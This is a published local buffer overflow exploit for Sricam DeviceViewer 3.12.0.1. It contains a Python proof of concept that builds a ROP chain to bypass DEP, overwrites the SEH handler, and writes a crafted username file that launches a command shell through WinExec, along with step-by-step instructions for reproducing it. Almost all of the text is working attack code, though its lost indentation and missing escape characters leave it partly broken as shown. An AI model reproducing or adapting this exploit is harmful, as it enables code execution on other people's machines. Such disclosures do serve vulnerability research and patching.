DeviceViewer version 3.12.0.1 add user local buffer overflow exploit with DEP bypass.

MD5 | 70ae5f2f1f2b9c91d4222fed2be40c4b

# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1

# Steps to reproduce:
# 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
# 2. Change the related address in the PoC
# 3. Generate the payload using the PoC
# 4. Log in the Sricam DeviceViewer application
# 5. Go to System Configuration -> User Management
# 6. Put the content of the generated file in User Info -> Username
# 7. Click on Add
# 8. A command shell will appear

#!/usr/bin/python

from struct import pack, unpack

def create_rop_chain():

rops = [

0x6a1142aa, # XOR EDX,EDX # RETN

0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0x6ae9c126, # &Writable location [avutil-50.dll]

0x6a5dac8a, # POP EAX # RETN
0xff9b929d, # NEG "cmd"

0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]

0x6994766b, # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP

0x6a18e062, # ADD ESP, 10 # RETN ---> ESI
0x6a2420ea, # ROP NOP ---> EDI

0x6a45e446, # XCHG EAX,EDX # RETN [avcodec-54.dll]
0x6a29d716, # XCHG EAX,ECX # RETN [avcodec-54.dll]

## ECX = ascii "cmd"

0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0x6a36264a, # CALL EBX

## EDX = CALL EBX

0x6a5dac8a, # POP EAX # RETN
0x76e33231, # ptr to WinExec() [kernel32.dll]
#### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication

0x6a150411, # XCHG EAX,EBX # RETN [avcodec-54.dll]

## EBX = &WinExec

0x6a5dac8a, # POP EAX # RETN
0xffffffff, # -0x00000001-> ebx
0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]

## EAX = 1

0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll]
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
]
return ''.join(pack('<I', _) for _ in rops)


def nops(length):
return "x90" * length

rop_chain = create_rop_chain()
maxlen = 5000

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)

# Don't care nseh
nseh = nops(4)

payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000

print("Exploit Length: " + str(len(payload)))

try:
fname = "exprop.txt"
exploit = open(fname,"w")
print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
print("Author: Alessandro Magnosin")
print("[*] Creating evil username")
exploit.write(payload)
exploit.close()
print("[+] Username file createdn")
print("[i] Now go to 'User Management' and try to add a user with user=")
print("[+] A command shell will open")
except:
print("[!] Error creating the file")

Source